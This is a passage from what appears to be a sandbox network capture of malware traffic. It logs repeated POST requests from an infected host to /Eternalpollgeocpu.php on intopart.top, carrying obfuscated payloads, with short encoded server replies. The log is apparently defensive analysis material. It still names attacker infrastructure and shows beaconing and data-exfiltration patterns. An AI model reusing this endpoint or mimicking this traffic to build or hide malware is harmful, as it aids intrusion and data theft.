Apr 29, 2024 01:04:08.830729008 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:08.941306114 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:08.941441059 CEST	1080	OUT	Data Raw: 58 53 5a 5b 50 5e 5e 54 54 56 50 51 5a 57 51 5b 5b 52 5e 48 54 5d 50 48 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XSZ[P^^TTVPQZWQ[[R^HT]PH]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'&= ^#T,2%Z,6<3>:<=0'008&4>^3: Z/!Z/
Apr 29, 2024 01:04:09.331783056 CEST	583	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8ILgqf9WJcNcE0AufM243%2BPhwbV49PGkodzzHx40jj%2FpDZLZmjwil0vbaxuU7svP9s9VjcvpGOC3JjU2BSvz%2BI2gOna0eHHCb4d4jJK5jFSqCXuMvC9BuhCuOHSgO%2BY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab08f8bc513ff-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:09.331850052 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.4	49853	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:09.566958904 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:09.676834106 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:09.677076101 CEST	1080	OUT	Data Raw: 58 53 5a 51 55 58 5b 50 54 56 50 51 5a 50 51 5a 5b 5a 5e 46 54 59 50 40 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XSZQUX[PTVPQZPQZ[Z^FTYP@]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_''>8\71.1\,6 Q3;*:))> $,,,%43!3 Z/!Z/<
Apr 29, 2024 01:04:10.071346998 CEST	585	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sqe%2FSu0VfLM%2B9CpEg7nS3YKBzQpJTlESVtOw%2F%2FFMN78Yr%2ByeTaUxxn3Uq4rF4FL9VoejdMGPHlkYj1M4Mbn6hNhCMMMnyDbxszHgVVQyTSnyWBZs6sNTWgqg0ydgzFc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0942e4aa23f-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:10.071391106 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.4	49854	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:10.300725937 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:10.411166906 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:10.411284924 CEST	1080	OUT	Data Raw: 5d 5e 5a 5c 50 59 5b 5e 54 56 50 51 5a 50 51 51 5b 52 5e 44 54 53 50 44 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]^Z\PY[^TVPQZPQQ[R^DTSPD]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$'=3 2(1>:/U$[0Y)*.+'P$R//%X 0&_0 Z/!Z/<
Apr 29, 2024 01:04:10.806148052 CEST	570	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9lEdrAoxllEburBiX1sCYJvNx1PeopY1RuzmlReqodrYDLbzUjzSsYLoRPz%2FtdMvTdG3Fmh7jaxdkkm6sMGw3dmBUvo%2BSQYVxWKEvnW5CVp3YnuSx7nmtBtrIEEWjxc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab098b83a2c07-ORD alt-svc: h2=":443"; ma=60
Apr 29, 2024 01:04:10.806165934 CEST	9	IN	Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:10.806180954 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.4	49855	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:10.660840034 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1760 Expect: 100-continue
Apr 29, 2024 01:04:10.771373034 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:10.771589994 CEST	1760	OUT	Data Raw: 58 58 5f 5b 50 5d 5b 5f 54 56 50 51 5a 52 51 52 5b 5e 5e 43 54 53 50 47 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XX_[P][_TVPQZRQR[^^CTSPG]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$&-( ]&>^/%(0<^=):W?#V$ /;Y=733: Z/!Z/4
Apr 29, 2024 01:04:11.074836016 CEST	736	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oM3X%2F%2BtnVSGnBDbKBTo9GCc%2BbWeCTtifTimLmOUWdGiFxI8H0pO0l6abGnKbFlhycUqZ3OfnONV%2BwfH0vSRooEqPsQLpsBYlUJrFJSsoQlJ%2F3nmObvN9mEkW9VUR%2Fso%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab09afe8f2a2a-ORD alt-svc: h2=":443"; ma=60 Data Raw: 39 38 0d 0a 0e 12 23 04 2b 05 0b 56 3d 32 32 18 24 22 38 0f 32 3f 3b 19 28 3f 26 40 24 23 05 03 2f 58 31 0e 26 24 2c 5d 20 39 05 02 31 22 2c 08 2b 0e 20 59 02 1c 3a 1b 25 17 32 59 25 10 33 16 3f 54 22 04 23 3e 23 03 29 16 3d 08 33 2c 21 5e 28 33 31 02 2b 39 28 1e 2c 3d 39 5b 32 37 2f 56 3c 35 2c 52 08 13 23 0c 3c 20 24 1c 22 06 2b 1f 33 0c 2a 5e 26 0b 2f 1b 21 5e 2c 56 28 17 20 5f 33 0b 3e 10 31 32 25 0c 2d 1d 2f 40 23 12 07 10 33 3d 21 5c 2f 02 20 49 0f 34 5d 53 0d 0a Data Ascii: 98#+V=22$"82?;(?&@$#/X1&$,] 91",+ Y:%2Y%3?T"#>#)=3,!^(31+9(,=9[27/V<5,R#< $"+3*^&/!^,V( _3>12%-/@#3=!\/ I4]S
Apr 29, 2024 01:04:11.074853897 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.4	49856	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:11.028718948 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:11.138499975 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:11.138716936 CEST	1080	OUT	Data Raw: 5d 58 5a 5e 55 5d 5e 52 54 56 50 51 5a 5f 51 55 5b 5f 5e 47 54 58 50 43 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]XZ^U]^RTVPQZ_QU[_^GTXPC]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'Z%'4!#%-5\,53$=<X=:!)-W& 8//%] #)3 Z/!Z/
Apr 29, 2024 01:04:11.540447950 CEST	579	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zH86F9DJbOY6h6bd9CkGpXgPy6k3D5WtJirw66fui9oDfRd3CpK3ADLceBoE5YN3hfXanJYm%2FpgYgtgNlhlWuy0ueWVk99zNs7vF9%2B3ZNwhjyjcuEk2x4StxHo7y9ks%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab09d4801a243-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:11.540555954 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.4	49857	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:11.765644073 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1076 Expect: 100-continue
Apr 29, 2024 01:04:11.876087904 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:11.876220942 CEST	1076	OUT	Data Raw: 5d 58 5a 5f 55 5a 5e 52 54 56 50 51 5a 56 51 50 5b 52 5e 45 54 53 50 45 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]XZ_UZ^RTVPQZVQP[R^ETSPE]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$2,\#T8Y&=9,5$><^=)"?(&0'V-,=\# )$: Z/!Z/(
Apr 29, 2024 01:04:12.272984028 CEST	585	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gnewx%2FIGkBHm%2BGEfyrhO6unQfgucf2BuCyeMAk6Q4iGirYGZ4GkLNt5VbYnOtJLsSOt%2BgauXULjKjGae1VU30pdyD80rUPyDffydDwhv1c3ljn%2FAyKXol1Hnuiu9V%2Fo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0a1e82002b8-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:12.273015022 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.4	49858	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:12.504597902 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:12.614660978 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:12.614815950 CEST	1080	OUT	Data Raw: 58 58 5a 5e 55 5b 5b 57 54 56 50 51 5a 55 51 52 5b 5e 5e 44 54 59 50 45 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XXZ^U[[WTVPQZUQR[^^DTYPE]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$& #"0^%X*-%#'- ^>\!(=7'3(8? 50 Z/!Z/(
Apr 29, 2024 01:04:13.043832064 CEST	593	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Ky2vV5ivU6%2FN3O0%2FYOZVQm%2FSvsZnYsx%2BkETTCXkJqXsLjb%2BmB0p5koV5NT4iYFfk2dItt3FchqL5Zd8cUNTeN4RTwC%2BB%2BYNZoNm%2BPO33jjEDr009ODPTCq%2FqpFTUqo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0a68ff3631a-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:13.043852091 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.4	49859	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:13.285198927 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1076 Expect: 100-continue
Apr 29, 2024 01:04:13.395109892 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:13.395252943 CEST	1076	OUT	Data Raw: 58 5b 5a 58 55 5d 5b 51 54 56 50 51 5a 56 51 52 5b 53 5e 46 54 53 50 42 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X[ZXU][QTVPQZVQR[S^FTSPB]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$'=,]#T02X=[/%0T$.,[>:)(3Q'88,)[4U5': Z/!Z/
Apr 29, 2024 01:04:13.799397945 CEST	587	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KQ6M%2BYnu%2Fx2Blh1DCxOYezZsEL49FJ%2B%2B8PKG8nE6zoHAj5NMqr5NMvBWoNyn0wF2tdSnciQiiKNso5lkkme0TnovbI5NZfBAeVbBCWUJEM4KAa7qZ7iTLXP%2BuP%2FNYiM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0ab6bca0165-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:13.799417973 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.4	49860	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:14.033524036 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:14.144510031 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:14.144634008 CEST	1080	OUT	Data Raw: 58 5b 5a 5e 50 5a 5e 52 54 56 50 51 5a 5f 51 54 5b 5d 5e 47 54 58 50 41 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X[Z^PZ^RTVPQZ_QT[]^GTXPA]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'2-#! ^%8 P'-+>=?43038<% #&0 Z/!Z/
Apr 29, 2024 01:04:14.564297915 CEST	576	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CHx6SztpkQOHQCAeYEHrWnZN%2FhmlL%2BAKA%2FIXO0Vl8SHQ6IBENJpTs%2FmzrdW14yzr6EBFAiG5DPhdCAodabV%2FMSa2AsjrA4MQ2QE4OnLFxtTDXPmgXuTY0Yli0buxFi0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0b01b6a1251-ORD alt-svc: h2=":443"; ma=60
Apr 29, 2024 01:04:14.564321041 CEST	14	IN	Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<ZYT0

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.4	49861	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:14.804089069 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:14.914371014 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:14.914788961 CEST	1080	OUT	Data Raw: 58 52 5f 5b 55 59 5e 56 54 56 50 51 5a 53 51 56 5b 5c 5e 47 54 53 50 49 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XR_[UY^VTVPQZSQV[\^GTSPI]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'[&-8#T8X$-=_,,T$$Z>V??$/T;?Z#0 Z/!Z/0
Apr 29, 2024 01:04:15.193953037 CEST	581	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ARu%2BCq01Q0McJG9NuacaCyz7hXCq3u85AyW9KvuJCf%2B3Zi0Cujxde7orGCax4E5rB053fyM7qDjN7XC6yDqGb2wIYSm3PakoyR0sUWAA%2FosheMLZTBlrIiKquBZVluk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0b4ed1586e4-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:15.193973064 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
113	192.168.2.4	49862	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:15.437788010 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:15.548541069 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:15.548814058 CEST	1080	OUT	Data Raw: 5d 5a 5a 5d 50 59 5e 52 54 56 50 51 5a 52 51 57 5b 53 5e 49 54 58 50 48 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]ZZ]PY^RTVPQZRQW[S^ITXPH]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$1$Z4 ^1>2;C(3>'>9&+[003;<& #"0 Z/!Z/4
Apr 29, 2024 01:04:15.832899094 CEST	587	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G6JQF8to%2FhFMT3VEFk6iXmz3v1qbG9mD7lVRC%2Ft65chKhZEQeeCsffJ1eQr8%2BRbBLI%2F8bYSnBuX0mZvgSjPNEG9n3RWXgNIITwbyiHqNjBpL%2Fd5iQPlCOB%2FU3chbA60%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0b8dc502a96-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:15.832917929 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.4	49863	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:16.061431885 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:16.175309896 CEST	25	IN	HTTP/1.1 100 Continue
